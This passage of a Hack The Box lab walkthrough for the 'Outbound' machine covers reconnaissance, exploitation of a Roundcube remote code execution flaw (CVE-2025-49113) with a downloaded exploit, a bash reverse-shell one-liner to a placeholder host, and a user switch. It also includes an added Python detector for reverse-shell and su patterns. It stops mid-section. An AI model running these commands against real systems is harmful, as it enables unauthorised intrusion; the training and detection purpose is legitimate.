Hack The Box - HTB Outbound Writeup - Easy - Season 8 Weekly - July 12th, 2025

HTB Outbound - Complete Walkthrough

Machine Information

Attribute            Value
Target IP            10.x.x.x
Hostname             mail.outbound.htb
OS                   Ubuntu Linux
Difficulty           Easy
Initial Credentials  tyler:LhKL1o9Nm3X2

Reconnaissance

Port Scanning

nmap -sV -sC -v 10.x.x.x

Results:

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-12 14:46 CDT
Nmap scan report for mail.outbound.htb (10.x.x.x)
Host is up (0.012s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.6p1 Ubuntu 3ubuntu13.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 0c:4b:d2:76:ab:10:06:92:05:dc:f7:55:94:7f:18:df (ECDSA)
|_  256 2d:6d:4a:4c:ee:2e:11:b6:c8:90:e6:83:e9:df:38:b0 (ED25519)
80/tcp open  http    nginx 1.24.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST
|_http-title: Roundcube Webmail :: Welcome to Roundcube Webmail
|_http-server-header: nginx/1.24.0 (Ubuntu)

Service Analysis

  • SSH (Port 22): OpenSSH 9.6p1 Ubuntu
  • HTTP (Port 80): nginx 1.24.0 serving Roundcube webmail

The web application is identified as Roundcube Webmail, accessible at http://mail.outbound.htb/.

Initial Access

Roundcube Authentication

Using the provided credentials:

  • Username: tyler
  • Password: LhKL1o9Nm3X2

Successfully authenticated to the Roundcube webmail interface.

Vulnerability Identification

Logging in and examining the application shows that this Roundcube version is vulnerable to CVE-2025-49113, a remote code execution vulnerability.

CVE-2025-49113 Exploitation

1. Download the exploit:

wget https://raw.githubusercontent.com/hakaioffsec/CVE-2025-49113-exploit/refs/heads/main/CVE-2025-49113.php

2. Execute the exploit for reverse shell:

php CVE-2025-49113.php http://mail.outbound.htb/ tyler LhKL1o9Nm3X2 "bash -c 'bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1'"

3. Caught reverse shell as www-data

4. Switch to tyler user:

su tyler
# Password: LhKL1o9Nm3X2
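
From the defender's side, the steps above leave a recognizable process trail: the web server account spawning an interactive shell with a /dev/tcp redirection, then running su. The following added example (not part of the original writeup) flags those patterns in process-execution events; the JSON event schema, the account list and the sample events are constructed assumptions.

```python
import json
import re

# Constructed sample events in a hypothetical JSON-lines schema (not a real tool's format).
# 203.0.113.7 is a documentation-range address used as a placeholder.
SAMPLE_EVENTS = """\
{"ts": "2025-07-12T19:50:10Z", "user": "www-data", "parent": "php-fpm", "cmdline": "/usr/sbin/sendmail -t -i"}
{"ts": "2025-07-12T19:52:01Z", "user": "www-data", "parent": "php-fpm", "cmdline": "bash -c 'bash -i >& /dev/tcp/203.0.113.7/4444 0>&1'"}
{"ts": "2025-07-12T19:53:40Z", "user": "www-data", "parent": "bash", "cmdline": "su tyler"}
{"ts": "2025-07-12T19:53:45Z", "user": "tyler", "parent": "su", "cmdline": "bash -i"}
"""

# Accounts that normally run only the web stack (assumed list; adjust per host).
WEB_ACCOUNTS = {"www-data", "nginx", "apache"}

# Each rule: (name, pattern matched against the full command line).
RULES = [
    # bash's /dev/tcp/HOST/PORT pseudo-device, as used in the reverse shell one-liner
    ("reverse-shell", re.compile(r"/dev/(?:tcp|udp)/[^/\s]+/\d+")),
    # an interactive shell (sh/bash/dash/zsh -i); must not match "sendmail -t -i"
    ("interactive-shell", re.compile(r"(?:^|[\s'\"/])(?:ba|da|z)?sh\s+-i\b")),
    # su invoked as its own token (not sudo, not a substring of another word)
    ("account-switch", re.compile(r"(?:^|[\s/])su(?:\s|$)")),
]


def detect(jsonl: str):
    """Return (timestamp, user, [rule names]) for suspicious web-account processes."""
    findings = []
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        # Only processes owned by a web service account are in scope here.
        if event["user"] not in WEB_ACCOUNTS:
            continue
        hits = [name for name, rx in RULES if rx.search(event["cmdline"])]
        if hits:
            findings.append((event["ts"], event["user"], hits))
    return findings


if __name__ == "__main__":
    for ts, user, hits in detect(SAMPLE_EVENTS):
        print(f"{ts} {user}: {', '.join(hits)}")
```
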

Information Gathering

Roundcube Configuration Analysis

Located and examined the Roundcube configuration file:

File: /var/www/html/roundcube/config/config.inc.php

Key findings: